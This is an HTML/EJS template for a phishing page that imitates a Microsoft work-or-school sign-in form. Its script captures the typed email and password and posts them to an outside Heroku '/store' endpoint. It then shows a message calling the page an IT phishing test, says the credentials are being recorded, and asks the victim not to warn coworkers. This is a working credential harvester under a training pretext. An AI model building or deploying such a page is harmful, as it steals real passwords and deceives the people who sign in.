<!DOCTYPE html>
<html>
<head>
  <% include ../partials/header.ejs %>
</head>
<script>
	$(document).ready(function(){
        var email,password;
        $("#signin").click(function(){
          email=$("#email").val();
          password=$("#password").val();
          $.post("https://lmpt-heroku-app.herokuapp.com/store",{email: email,password: password}, function(data){
			
            if(data==='done')
              {
                console.log("store success");
              }
          });
		  $("body").html("<h2>Oops! You should not have done that.</h2><br><br><p>Your friendly IT department sent out a suspicious email to test how susceptible we are to phishing scams. It had a link that took you to this page, and you entered your credentials. If this were a real scam, they would have your login information.</p><p>The IT department is recording the information submitted on this page to help us help you. We will not release it or use it for any nefarious purposes, though the same can't be said for real scammers!</p><p>We ask that you keep quiet about your experience with this. If you tell your coworkers, they'll have a forwarning that you did not get!</p>");
        });
     });
</script>

<body>

<form method="post" enctype="text/plain">
<p><p style="color: dimgray">Sign in with your work or school account</p>
<br>
<input id="email" name="email" type="text" placeholder="Email or phone" size="50"></input>
<br>
<br>
<input id ="password" name="password" type="password" placeholder="Password" size="50"></input>
<br>
<p><input name="keep" type="checkbox"></input>Keep me signed in</p>
<br>

<input class="submit-btn" id="signin" type="Submit" value="Sign in" style="background-color: royalblue; opacity: 1; border: none; color: white; padding: 10px 10px 10px 10px"></input> <input class="submit-btn" name="cancel" type="Submit" value="Cancel" style="background-color: lightgray; opacity: 1; border: none; color: black; padding: 10px 10px 10px 10px"></input>

<br>
<br>
<p style="color: royalblue">Can't access your account?</p>
<p><p style="color: dimgray">Don't have an account assigned by your work or school?
<br>
<span style="color: royalblue">Sign in with a Microsoft account</span></p>
</form>

</body>
</html>
